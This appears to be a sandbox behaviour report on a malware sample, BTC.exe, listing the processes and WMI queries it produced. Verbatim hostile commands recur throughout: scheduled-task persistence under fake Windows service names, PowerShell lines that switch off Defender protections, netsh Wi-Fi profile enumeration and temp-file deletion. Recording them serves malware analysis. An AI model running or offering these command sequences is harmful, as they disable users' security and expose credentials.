                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                            Source: C:\Users\user\Desktop\BTC.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: tmpFB68.tmp.dat.5.dr, tmpFB52.tmp.dat.4.dr, tmpFF50.tmp.dat.4.dr, tmpFAF4.tmp.dat.5.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: BTC.exeVirustotal: Detection: 63%
                            Source: unknownProcess created: C:\Users\user\Desktop\BTC.exe "C:\Users\user\Desktop\BTC.exe"
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\crack.exe "C:\Users\user\AppData\Roaming\crack.exe"
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\Cracked.exe "C:\Users\user\AppData\Roaming\Cracked.exe"
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe"
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat""
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"'
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-MpPreference -verbose
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE49C.tmp.cmd""
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe "C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Service Host" /tr "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 4
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe "C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe" /rl HIGHEST /f
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\user\AppData\Local\Temp\*
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Dol1ysW8Xfj9.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CMaYLAcPq0sZ.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Q83dEbLbhfIH.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\crack.exe "C:\Users\user\AppData\Roaming\crack.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\Cracked.exe "C:\Users\user\AppData\Roaming\Cracked.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE49C.tmp.cmd""Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exitJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat""Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-MpPreference -verbose
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Service Host" /tr "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe "C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe" /rl HIGHEST /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 4
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Dol1ysW8Xfj9.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\user\AppData\Local\Temp\*
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
